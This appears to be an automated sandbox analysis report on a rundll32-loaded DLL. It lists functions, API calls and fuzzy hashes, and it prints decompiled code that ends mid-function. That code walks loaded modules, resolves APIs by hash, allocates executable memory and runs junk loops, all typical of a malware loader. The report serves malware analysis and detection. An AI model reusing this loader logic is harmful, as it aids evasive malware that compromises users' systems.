Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: 1f7832adce6054ab2e29c3564a6c86432f21f126c2001ea2e87e43f4245e308d
Instruction ID: 4191d06a34f2269d8b0d70d93219f81a94cd76d82bafe21d16dd0ff97893c6fd
Opcode Fuzzy Hash: 1f7832adce6054ab2e29c3564a6c86432f21f126c2001ea2e87e43f4245e308d
Instruction Fuzzy Hash: 6921D532604657AF87108FE6DA4485B7B69FF853603049929E848A7F60DB30D850CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EAC60, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 6E7EAC7A

Part of subcall function 6E7EABC7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 6E7EABF6
Part of subcall function 6E7EABC7: ___AdjustPointer.LIBCMT ref: 6E7EAC11

_UnwindNestedFrames.LIBCMT ref: 6E7EAC8F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 6E7EACA0
CallCatchBlock.LIBVCRUNTIME ref: 6E7EACC8

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 9504731aa870a27e8b80bf03c8235c97476a45dd7a2f470bfcd7f70d1e15bee8
Instruction ID: aa5db1cab92262add56fb6e7e91f6dcd9fcde505c9bd710f3e54bb5fbd005ae2
Opcode Fuzzy Hash: 9504731aa870a27e8b80bf03c8235c97476a45dd7a2f470bfcd7f70d1e15bee8
Instruction Fuzzy Hash: BC01C532100109BBDF125E95CE45DEB7F7EEF88758F044414FA1856530D732E861ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D86F0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6E7D86F7
VariantCopy.OLEAUT32(?,?), ref: 6E7D8701
_com_issue_error.COMSUPP ref: 6E7D8713
VariantClear.OLEAUT32 ref: 6E7D8721

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: 83ab420df39a1cee974150c45668c287bc1c9d923c8aea5ad5a321be8f01e403
Instruction ID: e23583f53f66f4bbeed2e533fe664c1c958eda31f7c9ece02d0dd519db7893d0
Opcode Fuzzy Hash: 83ab420df39a1cee974150c45668c287bc1c9d923c8aea5ad5a321be8f01e403
Instruction Fuzzy Hash: 32D05E726005296F9E106BE59D0CDCA7A1CEE123653000469F609C2401CB76C500D7F5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F6B38, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F6B9C: _free.LIBCMT ref: 6E7F6BBC

_free.LIBCMT ref: 6E7F6B52

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E7F6B65
_free.LIBCMT ref: 6E7F6B76
_free.LIBCMT ref: 6E7F6B87

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 36fb3bc044ac2a113a91dc81310d3953edc0bde89d5f84f0a1537d7156c62b21
Instruction ID: 91c0597570582a2c0f6d8e10a9fa3ca890cda38eed53bf07c744a531560c8ba7
Opcode Fuzzy Hash: 36fb3bc044ac2a113a91dc81310d3953edc0bde89d5f84f0a1537d7156c62b21
Instruction Fuzzy Hash: 89F06D70858A14FFEE066FE4DB288DA3B6EEB766143004607E80C1AB31FB361552CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DB2A0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,972AE1C9,00000000,?), ref: 6E7DB30E

Strings

\PerfmonBar\config.xml, xrefs: 6E7DB3C2

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: b3d09f51e2124536183da4b078ac9b46bec947aed2ee9f8224ee3acfa03fb6b2
Instruction ID: be98bc62339f6c90f55960b8038b23c7c2200d4081a4f5a074f2301cc9bab130
Opcode Fuzzy Hash: b3d09f51e2124536183da4b078ac9b46bec947aed2ee9f8224ee3acfa03fb6b2
Instruction Fuzzy Hash: A071C471D006589FDB20CFA4CD88BDEB7B4FB08714F10469DD819A7794EB74AA48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F8A7D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E7F8B0D

Strings

pow, xrefs: 6E7F8AE5, 6E7F8B02

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: d147c62a1d64762690218f1621e7073f94c4dfd5b7ccd9cfc257a6486a5311d6
Instruction ID: b3efc98aac819ae3644be52af95d01c9605cdb567ba228d1b2156fec026bac9d
Opcode Fuzzy Hash: d147c62a1d64762690218f1621e7073f94c4dfd5b7ccd9cfc257a6486a5311d6
Instruction Fuzzy Hash: B1518DA1A1C607CAE70167D9CE1139A3BA4DF41754F208D69E0E4423FDEB798496CF86

Uniqueness

Uniqueness Score: -1.00%

Function 6E804CDB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E804F36,?,00000050,?,?,?,?,?), ref: 6E804DB6

Strings

OCP, xrefs: 6E804D2F
ACP, xrefs: 6E804CF9

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: f2d5befb7d6e6a844dacc34a72a80082c4b0a21b4215cf3b6de7a669f5567421
Instruction ID: 9a0b4af9e8f9a4a443944d18185ccd7e6cd557b40e3d70147ddecd1ba57b6ee7
Opcode Fuzzy Hash: f2d5befb7d6e6a844dacc34a72a80082c4b0a21b4215cf3b6de7a669f5567421
Instruction Fuzzy Hash: 3521C422A95105A6E766CEE5CD01BC773BAEFF1B51B424C58ED09D7244E732D902C290

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E76B1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6E7E6F36,00000001,00000004,6E7D209A,00000000,?,6E7D1BA7,6E8204C0,6E7D5550,6E8204C4,?,6E7D209A,00000004,00000001), ref: 6E7E7735

Strings

ios_base::failbit set, xrefs: 6E7E76B4

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: d2be2c2614f4c6c516ed06c238760090a177dd412110e6f4a750f853ce60740b
Instruction ID: 3b64257467b9e16b10c802680d95547be5390a44f39a7c7c9515b8c0a8c87dfe
Opcode Fuzzy Hash: d2be2c2614f4c6c516ed06c238760090a177dd412110e6f4a750f853ce60740b
Instruction Fuzzy Hash: CC11003230412AEFDF025FA8CE8499EBB66FF09755B00403CF919C6AA1CB309810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FE186, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,0099A278), ref: 6E7FE21C
GetLastError.KERNEL32 ref: 6E7FE22A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E7FE285

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6f65370fe2a0681bde41869cfd4b42c6bb97433cb44f52be73f79be43e4cb58d
Instruction ID: e1169674948541dcb26f1babc60b5df16dd11999818f7610f69d04c8b8c6bc04
Opcode Fuzzy Hash: 6f65370fe2a0681bde41869cfd4b42c6bb97433cb44f52be73f79be43e4cb58d
Instruction Fuzzy Hash: CC41B830604A5AEFDB518FE9CA447AA7BB5EF02370F114179E868A73B0E7308902CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7BC5, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E7E2972), ref: 6E7E7BCA
HeapAlloc.KERNEL32(00000000), ref: 6E7E7BD1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E7E7C17
HeapFree.KERNEL32(00000000), ref: 6E7E7C1E

Part of subcall function 6E7E7A64: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E7E7C0D,00000000), ref: 6E7E7A88
Part of subcall function 6E7E7A64: HeapAlloc.KERNEL32(00000000), ref: 6E7E7A8F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 15313bfc84c829068ab09384988b18e297e85b7861802198b743189656716e5e
Instruction ID: 26503c7105fed2dab95a00f5f7ece93f643d61c828685296dcc6e6fd5699813f
Opcode Fuzzy Hash: 15313bfc84c829068ab09384988b18e297e85b7861802198b743189656716e5e
Instruction Fuzzy Hash: 6AF0E973548A169BCB511BFCA90CD5B3A6DAF86751711487CF04AC67D4DF34C400CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7004 Parent PID: 6984 rundll32.exeCOMMON

Executed Functions

Function 6E7D6430, Relevance: 120.9, APIs: 65, Strings: 3, Instructions: 1860
threadwindowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E6E7D6430(void* __ebx, signed char __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed char _v28;
				signed int _v29;
				signed char _v36;
				signed int _v40;
				signed char _v41;
				signed int _v48;
				signed char _v52;
				signed int _v56;
				signed short* _v60;
				signed char _v64;
				signed int _v72;
				signed int _v76;
				void* _v80;
				signed int _v84;
				signed char _v85;
				void* _v92;
				signed int _v96;
				signed int _v100;
				signed int* _v108;
				signed char _v112;
				signed int _v116;
				void* _v120;
				signed char _v140;
				signed int _v144;
				signed int _v148;
				void* _v160;
				void* _v164;
				void* _v192;
				intOrPtr _v244;
				char _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v272;
				char _v276;
				void* _v280;
				void* __ebp;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed char _t495;
				signed int _t496;
				void* _t500;
				signed int _t501;
				signed int _t512;
				void* _t513;
				void* _t517;
				void* _t523;
				void* _t524;
				signed int _t530;
				signed int _t531;
				signed int _t535;
				long _t536;
				void* _t539;
				signed int _t545;
				signed char _t547;
				signed int _t551;
				signed int _t555;
				signed int _t562;
				void* _t563;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t572;
				WCHAR* _t573;
				void* _t574;
				unsigned short _t576;
				unsigned short _t577;
				signed int _t581;
				struct HWND__* _t582;
				signed char _t588;
				signed char _t591;
				signed int _t595;
				signed int _t601;
				signed int _t602;
				signed int _t609;
				signed int _t613;
				struct HWND__* _t618;
				signed int _t620;
				struct HWINSTA__* _t623;
				void* _t627;
				void* _t628;
				void* _t631;
				signed int _t633;
				signed int _t636;
				char _t637;
				void _t642;
				signed int _t644;
				signed int _t645;
				void* _t646;
				signed char _t647;
				signed char _t651;
				signed char _t652;
				signed int _t653;
				signed char _t656;
				signed char _t659;
				signed char _t662;
				signed char _t663;
				signed char _t664;
				signed char _t667;
				signed char _t668;
				long _t672;
				void* _t674;
				long _t675;
				void* _t676;
				void* _t678;
				void* _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed char _t690;
				signed int _t694;
				signed int _t696;
				signed int _t699;
				signed char _t703;
				signed int _t704;
				signed char _t710;
				signed int _t716;
				signed char _t724;
				signed char _t727;
				struct HWND__* _t729;
				signed int _t731;
				signed int _t732;
				signed int _t735;
				signed int _t743;
				signed int _t745;
				signed char _t746;
				struct HWND__* _t753;
				signed char _t763;
				signed char _t767;
				signed int _t778;
				void* _t782;
				signed int _t783;
				signed char _t786;
				intOrPtr* _t791;
				void* _t792;
				signed int _t794;
				signed char _t796;
				signed int _t797;
				signed int _t803;
				signed int _t805;
				signed char _t810;
				signed char _t821;
				signed char _t823;
				signed char _t824;
				signed int _t828;
				signed int _t829;
				signed int _t836;
				signed int _t841;
				signed int _t847;
				signed char _t848;
				char* _t851;
				signed int _t854;
				signed char _t857;
				signed int _t864;
				long _t875;
				void* _t876;
				signed char _t879;
				intOrPtr* _t884;
				void* _t888;
				signed int _t902;
				signed int _t908;
				signed char _t909;
				signed char _t910;
				signed int _t913;
				signed int _t914;
				signed int _t929;
				signed char _t933;
				intOrPtr _t944;
				signed int _t945;
				intOrPtr* _t946;
				intOrPtr* _t947;
				signed int _t949;
				void* _t951;
				intOrPtr* _t952;
				void* _t953;
				unsigned int _t954;
				void* _t955;
				intOrPtr _t957;
				signed int _t958;
				signed int _t960;
				signed int _t961;
				signed char _t962;
				signed int _t963;
				signed int _t968;
				signed int _t970;
				signed int _t971;
				void* _t972;
				intOrPtr* _t973;
				signed char _t974;
				void* _t975;
				signed char _t976;
				signed int _t977;
				intOrPtr* _t984;
				signed int _t987;
				signed char _t988;
				void* _t989;
				signed int _t990;
				signed int _t993;
				signed int _t994;
				void* _t996;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				intOrPtr* _t1002;
				signed int* _t1008;
				signed char _t1011;
				signed int _t1013;
				signed int _t1015;
				void* _t1016;
				signed int _t1017;
				void* _t1020;
				signed int _t1023;
				void* _t1024;
				signed char _t1025;
				void* _t1026;
				signed char _t1027;
				signed int _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1032;
				intOrPtr _t1033;
				void* _t1042;

				_t786 = __ecx;
				_push(0xffffffff);
				_push(E6E808AA0);
				_push( *[fs:0x0]);
				_t1033 = _t1032 - 0x108;
				_t487 =  *0x6e81e008; // 0x77dcee0d
				_t488 = _t487 ^ _t1031;
				_v24 = _t488;
				_push(__esi);
				_push(_t488);
				_t489 =  &_v16;
				 *[fs:0x0] = _t489;
				_v20 = _t1033;
				asm("movups xmm0, [ebp+0x8]");
				asm("movups [ebp-0x114], xmm0");
				asm("movups xmm0, [ebp+0x18]");
				asm("movups [ebp-0x104], xmm0");
				asm("movups xmm0, [ebp+0x28]");
				asm("movups [ebp-0xf4], xmm0");
				asm("rdtscp");
				_v28 = __ecx;
				if(__edx != 0 || _t489 > 0x989680) {
					_v36 = 0x9705dbf;
				} else {
					asm("rdtscp");
					_v28 = __ecx;
					_t489 = E6E807870(0x989680, 0, _t489, __edx);
					_v36 = _t489;
				}
				asm("rdtscp");
				_v28 = _t786;
				_t908 = _t489 * 0x40de >> 0x20;
				_t495 = E6E808130(_t489 * 0x40de, 0 + _t908, 0x5f, 0) + 3;
				_v112 = _t495;
				_v52 = _t495;
				_v140 = _t495;
				_t496 = _v36;
				_v40 = _t496;
				_v29 = _t496;
				_t984 = __imp__GetTickCount64;
				asm("xorps xmm0, xmm0");
				asm("movsd [ebp-0x7c], xmm0");
				asm("movsd [ebp-0xe0], xmm0");
				asm("movsd xmm0, [0x6e818650]");
				asm("movsd [ebp-0xb0], xmm0");
				asm("movsd [ebp-0x98], xmm0");
				asm("movsd xmm0, [0x6e818570]");
				asm("movsd [ebp-0xa8], xmm0");
				asm("movsd [ebp-0xc8], xmm0");
				asm("movsd xmm0, [0x6e818670]");
				_v144 = 0;
				_v148 = 0;
				_v48 = 0;
				asm("movsd [ebp-0xb8], xmm0");
				asm("movsd [ebp-0xd0], xmm0");
				 *_t984();
				 *_t984();
				_t500 = _v280;
				_v92 = _t500;
				_v164 = _t500;
				while(1) {
					_t501 =  *_t984();
					__imp__GetTickCount64();
					_v96 = _t501;
					_v28 = _t908;
					E6E8084C0(E6E807870(_t501, _t908, 0x2710, 0), _t502, _t908);
					asm("mulsd xmm0, [0x6e818550]");
					asm("movsd [ebp-0x64], xmm0");
					E6E8084C0(E6E807870(_v96, _v28, 0x2710, 0), _t504, _t908);
					asm("mulsd xmm0, [0x6e818650]");
					_t791 = _v92;
					asm("movsd xmm1, [ebp-0x64]");
					asm("addsd xmm1, xmm0");
					asm("mulsd xmm1, [0x6e818570]");
					asm("divsd xmm1, [0x6e818590]");
					asm("movsd [ebp-0x64], xmm1");
					asm("movsd [ebp-0xd8], xmm1");
					if( *_t791 != 0x5a4d) {
						goto L279;
					}
					_t908 =  *(_t791 + 0x3c);
					if(_t908 - 0x40 > 0x3bf) {
						goto L279;
					}
					_t908 = _t908 + _t791;
					_v116 = _t908;
					if( *_t908 == 0x4550) {
						_t944 =  *[fs:0x30];
						while(1) {
							_t793 = _v36;
							_t909 = _v52;
							_t508 = _t793 + _t793;
							if(_t793 + _t793 >= _t909) {
								_t513 =  *((intOrPtr*)(_t944 + 0xc));
								_v80 = _t513;
								_v160 = _t513;
								_t945 =  *((intOrPtr*)(_t513 + 0x14));
								_t514 = _v120;
								_v72 = _v120;
								goto L11;
							}
							asm("movsd xmm0, [0x6e8185d0]");
							asm("movsd [ebp-0x84], xmm0");
							do {
								__imp__IsWow64Message();
								asm("movsd xmm0, [ebp-0x84]");
								E6E7D5780(E6E8083AF(_t508), _t509, _t909);
								_t1033 = _t1033 + 8;
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("addsd xmm0, [ebp-0x84]");
								asm("cvttsd2si ecx, xmm0");
								asm("movsd [ebp-0xc0], xmm0");
								_t793 = E6E7D5ED0(_t793, _t909);
								_t508 = E6E808500(_t511, _t511);
								asm("movaps xmm1, xmm0");
								asm("movsd [ebp-0x84], xmm0");
								asm("mulsd xmm1, [ebp-0xc0]");
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("subsd xmm0, xmm1");
								asm("cvttsd2si eax, xmm0");
								__eflags = _t508 - 0x7f;
							} while (_t508 != 0x7f);
							_t512 = 0x11;
							do {
								_t512 = _t512 + _t512;
								_t794 = _t512;
								_v40 = _t794;
								_v29 = _t794;
								__eflags = _t794 - 0x56;
							} while (__eflags < 0);
						}
						while(1) {
							L11:
							_v108 = _t945;
							_v76 = _t945;
							if(_t945 == 0) {
								break;
							}
							_t1042 = _t793 - _t909;
							if(_t1042 <= 0) {
								_t864 = _v40;
								_t667 = 0;
								_t1017 = 0x6c;
								__eflags = _t864 - 0x80;
								if(_t864 != 0x80) {
									L125:
									__eflags = _t864 - 0x4f;
									if(_t864 != 0x4f) {
										L128:
										_t668 = 0x3e;
										L129:
										_v41 = _t668;
										asm("cdq");
										E6E7D5780(_t668, _t668, _t909);
										_t1033 = _t1033 + 8;
										_t668 = _v41 + _v41;
										goto L129;
									}
									_t672 = TlsAlloc();
									asm("movsd xmm0, [0x6e8185b0]");
									_t674 = E6E7D5780(E6E8083AF(_t672), _t673, _t909);
									asm("movsd xmm0, [0x6e8185c0]");
									_t1033 = _t1033 + 8;
									asm("movsd [ebp-0x7c], xmm0");
									__eflags = _t674 - 0x80;
									if(_t674 != 0x80) {
										goto L128;
									} else {
										goto L127;
									}
									do {
										L127:
										_t675 = GetDialogBaseUnits();
										asm("movsd xmm0, [ebp-0x7c]");
										asm("subsd xmm0, xmm0");
										_t676 = E6E8083AF(_t675);
										asm("movsd xmm0, [ebp-0x7c]");
										_t678 = E6E7D5990(_t909, E6E8083AF(_t676), _t909);
										_t1033 = _t1033 + 8;
										asm("movd xmm0, ecx");
										asm("cvtdq2pd xmm0, xmm0");
										asm("movsd [ebp-0x7c], xmm0");
										_t679 = E6E808500(_t678, _t676);
										asm("divsd xmm0, [ebp-0x7c]");
										asm("cvttsd2si eax, xmm0");
										__eflags = _t679 - 0x80;
									} while (_t679 == 0x80);
									goto L128;
								} else {
									goto L124;
								}
								do {
									L124:
									_t680 = E6E7D5990(_t909, _t1017, _t667);
									E6E7D57C0();
									_v48 = _t680;
									_v28 = _t909;
									E6E7D5990(_t909, _t680, _t909);
									_t1033 = _t1033 + 0x10;
									asm("cdq");
									_t864 = E6E807C80(_t680, _t909, _v48, _v28);
									E6E808500(_t683, _t864);
									_t667 = _v28;
									asm("movd xmm1, esi");
									_t1017 = _v48;
									asm("cvtdq2pd xmm1, xmm1");
									asm("mulsd xmm1, xmm0");
									asm("cvttsd2si ecx, xmm1");
									__eflags = _t864 - 0x80;
								} while (_t864 == 0x80);
								goto L125;
							}
							_t1020 =  *(_t945 + 0x24) & 0x0000ffff;
							_t685 =  *((intOrPtr*)(_t945 + 0x28));
							_v72 = _t685;
							_t968 = 0;
							_v120 = _t685;
							_t52 = _t1020 + 1; // 0x1
							_t686 = _t52;
							_v56 = 0;
							_t929 = _t686 * 4 >> 0x20;
							_push( ~(_t1042 > 0) | _t686 * 0x00000004);
							E6E7E4481( ~(_t1042 > 0) | _t686 * 0x00000004, _t929, _t1020, _t1042);
							_t1033 = _t1033 + 4;
							_t514 = _t1020;
							_v28 = _t1020;
							if(_t1020 == 0) {
								L110:
								_t793 = _v36;
								L111:
								__eflags = _v144;
								if(__eflags == 0) {
									L122:
									_t909 = _v52;
									_t945 =  *_v76;
									continue;
								}
								__eflags = _v148;
								if(__eflags == 0) {
									goto L122;
								}
								__eflags = _v48;
								if(__eflags == 0) {
									goto L122;
								}
								__eflags = _t793 - _v140;
								_t909 = 0x91afca54;
								_t690 =  !=  ? _t793 : _v112;
								_v8 = 2;
								_v36 = _t690;
								_v48 = _t690;
								E6E7D8080(0x91afca54);
								_t875 =  *((intOrPtr*)(_v116 + 0x50)) + 0xc;
								__eflags = _t875;
								_t514 = VirtualAlloc(0, _t875, 0x3000, 0x40); // executed
								_t876 = _t514;
								_v8 = 0xffffffff;
								_v80 = _t876;
								_v160 = _t876;
								break;
							}
							asm("cdq");
							_t694 = _v36 - _t929 >> 1;
							_v84 = _t694;
							do {
								if(_t694 < _v52) {
									_t1023 = 0x50;
									_t970 = 0;
									__eflags = 0;
									do {
										GetThreadLocale();
										_t696 = E6E807830(_t1023, _t970, _t1023, _t970);
										_v96 = _t696;
										_t970 = _t929;
										_t1023 = _t696;
										__eflags = _t696 - 0x7e;
									} while (_t696 != 0x7e);
									_v29 = 0x6f;
									do {
										GetEnvironmentStringsW();
										asm("cdq");
										_t699 = E6E7D5990(_t929, _v29, _t929);
										_t1033 = _t1033 + 8;
										_v29 = _t699;
										__eflags = _t699 - 0x76;
									} while (_t699 == 0x76);
									_v40 = 0x68;
									do {
										GetCommandLineA();
										asm("cdq");
										_t929 = E6E7D5780(_v40, _v40, _t929);
										_t1033 = _t1033 + 8;
										_v40 = _t929;
										_v29 = _t929;
										__eflags = _t929 - 0x70;
									} while (_t929 < 0x70);
									_t971 = _v56;
									_t1024 = _v72;
									goto L24;
								}
								_t783 = E6E7D8030(_t968, 0xd, _t1024);
								_t929 = _v40;
								_t971 = _t783;
								L24:
								_t703 =  *_t1024;
								_t704 = _t703 & 0x000000ff;
								if(_t703 >= 0x61) {
									_t971 = _t971 + 0xffffffe0;
								}
								_t968 = _t971 + _t704;
								_t694 = _v84;
								_t1024 = _t1024 + 1;
								_t879 = _v28 + 0xffff;
								_v56 = _t968;
								_v72 = _t1024;
								_v120 = _t1024;
								_v28 = _t879;
							} while (_t879 != 0);
							if(_t968 != 0x6a4abc5b) {
								goto L110;
							}
							_t1025 = _v52;
							while(_v36 + 4 <= _t1025) {
								if(_t929 <= 0x56) {
									__eflags = _t929 - 3;
									if(_t929 < 3) {
										_t782 = E6E7D5990(_t929, 0x11, 0);
										_t1033 = _t1033 + 8;
										_t84 = _t782 + 0x72; // 0x72
										_t929 = _t84;
									}
								} else {
									__imp__IsWow64Message();
									_t929 = 0x44;
								}
								asm("movsd xmm0, [0x6e818600]");
								asm("movsd [ebp-0x40], xmm0");
								if(_t929 != 6) {
									L36:
									if(_t929 < 2) {
										InSendMessage();
										E6E7D5990(_t929, 0, 0);
										_t1033 = _t1033 + 8;
									}
									_t777 = 0x1f;
									do {
										asm("cdq");
										_t778 = E6E7D5990(_t929, _t777, _t929);
										_t777 = _t778;
										_t1033 = _t1033 + 8;
										_t929 = _t778;
										_v40 = _t929;
										_v29 = _t929;
									} while (_t929 < 2);
									continue;
								} else {
									do {
										GetSystemDefaultLangID();
										asm("cvttsd2si ecx, [ebp-0x40]");
										E6E7D57C0();
										asm("movsd xmm1, [ebp-0x40]");
										asm("movd xmm0, eax");
										asm("cvtdq2pd xmm0, xmm0");
										asm("divsd xmm1, xmm0");
										asm("subsd xmm0, xmm1");
										asm("movsd [ebp-0x40], xmm1");
										asm("cvttsd2si edx, xmm0");
									} while (_t929 == 6);
									goto L36;
								}
							}
							_t972 =  *(_v76 + 0x10);
							_v80 = _t972;
							_v160 = _t972;
							_t710 =  *((intOrPtr*)( *((intOrPtr*)(_t972 + 0x3c)) + _t972 + 0x78)) + _t972;
							_v64 = _t710;
							_v60 =  *((intOrPtr*)(_t710 + 0x20)) + _t972;
							_t793 = _v36;
							_v96 =  *((intOrPtr*)(_t710 + 0x24)) + _t972;
							_t514 = 3;
							_v84 = 3;
							while(1) {
								_v28 = _t793;
